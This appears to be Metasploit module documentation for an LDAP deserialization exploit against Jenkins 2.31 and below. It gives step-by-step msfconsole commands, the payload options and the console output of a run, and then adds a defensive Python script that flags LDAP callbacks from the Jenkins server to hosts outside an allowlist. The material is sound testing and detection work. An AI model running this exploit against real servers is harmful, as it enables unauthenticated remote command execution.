## Vulnerable Application
Jenkins 2.31 or below is vulnerable and can be downloaded from [updates.jenkins-ci.org](https://updates.jenkins-ci.org/download/war/2.31/jenkins.war).
Exploitation does not require authentication; only HTTP access to the vulnerable application is needed.
## Verification Steps
1. Download [Jenkins 2.31](https://updates.jenkins-ci.org/download/war/2.31/jenkins.war)
2. Install and start Jenkins: ```java -jar jenkins.war```
3. Start ```msfconsole```
4. Do: ```use exploit/linux/misc/jenkins_ldap_deserialize```
5. Do: ```set RHOST [target host]```
6. Do: ```set PAYLOAD cmd/unix/generic```
7. Do: ```set CMD 'touch /tmp/wtf'```
8. Do: ```run```
9. It should create /tmp/wtf on the target host.
## Required Options
**RHOST**
The address of the Jenkins server.
## Options
**RPORT**
The HTTP port for the Jenkins server. (Defaults to 8080)
**TARGETURI**
The path to the target instance of Jenkins. (Defaults to /)
**SRVHOST**
The local address to listen for the LDAP request on. (Defaults to 127.0.0.1)
**SRVPORT**
The local port to listen for the LDAP request on. (Defaults to 1389)
**LDAPHOST**
The LDAP host the exploit will connect to. Can differ from ```SRVHOST``` in an environment that uses port forwarding. (Defaults to 127.0.0.1)
## Scenarios
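Example usage against a Unix target running Jenkins 2.31. With ```cmd/unix/generic``` no session is expected; success is confirmed by the file created on the target.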
```
msf > use exploit/linux/misc/jenkins_ldap_deserialize
msf exploit(jenkins_ldap_deserialize) > set TARGETURI /
TARGETURI => /
msf exploit(jenkins_ldap_deserialize) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(jenkins_ldap_deserialize) > set RPORT 8080
RPORT => 8080
msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'
CMD => touch /tmp/wtf
msf exploit(jenkins_ldap_deserialize) > run
[*] Exploit completed, but no session was created.
```
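
The options above show that the target is made to send an LDAP request to a listener chosen by the module user (```SRVPORT``` defaults to 1389). The following is an added detection example, not part of the Metasploit documentation: it flags egress from a Jenkins server to hosts outside an allowlist and notes when it closely follows an inbound HTTP request. The flow records, addresses, allowlist and time window are constructed assumptions.

```python
import csv
import io

# Constructed flow records: time (s), source, destination, destination port.
SAMPLE_FLOWS = """\
ts,src,dst,dport
100,10.0.0.5,10.0.0.20,389
200,198.51.100.7,10.0.0.5,8080
201,10.0.0.5,198.51.100.7,1389
300,10.0.0.5,10.0.0.30,443
400,203.0.113.9,10.0.0.5,8080
402,10.0.0.5,203.0.113.50,10389
"""

JENKINS_HOST = "10.0.0.5"                    # assumed address of the Jenkins server
JENKINS_PORT = 8080                          # RPORT default from the module options
ALLOWED_EGRESS = {"10.0.0.20", "10.0.0.30"}  # assumed: directory server, artifact mirror
LDAP_PORTS = {389, 636, 1389}                # 1389 is the module's SRVPORT default
WINDOW = 5                                   # assumed seconds between HTTP request and callback


def find_callbacks(flow_csv):
    """Return one alert per Jenkins egress flow to a host outside the allowlist."""
    alerts, last_inbound = [], None
    for row in csv.DictReader(io.StringIO(flow_csv)):
        ts, dport = int(row["ts"]), int(row["dport"])
        # Remember the most recent inbound HTTP request to Jenkins.
        if row["dst"] == JENKINS_HOST and dport == JENKINS_PORT:
            last_inbound = (ts, row["src"])
            continue
        # Only egress from Jenkins to unlisted destinations is of interest.
        if row["src"] != JENKINS_HOST or row["dst"] in ALLOWED_EGRESS:
            continue
        alert = {"ts": ts, "dst": row["dst"], "dport": dport,
                 "ldap_port": dport in LDAP_PORTS, "after_http_from": None}
        # Correlate with an inbound request seen shortly before the egress.
        if last_inbound and 0 <= ts - last_inbound[0] <= WINDOW:
            alert["after_http_from"] = last_inbound[1]
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in find_callbacks(SAMPLE_FLOWS):
        print(a)
```

Because ```SRVPORT``` is configurable, the destination port is only a hint; the egress allowlist is what catches the second constructed callback on port 10389.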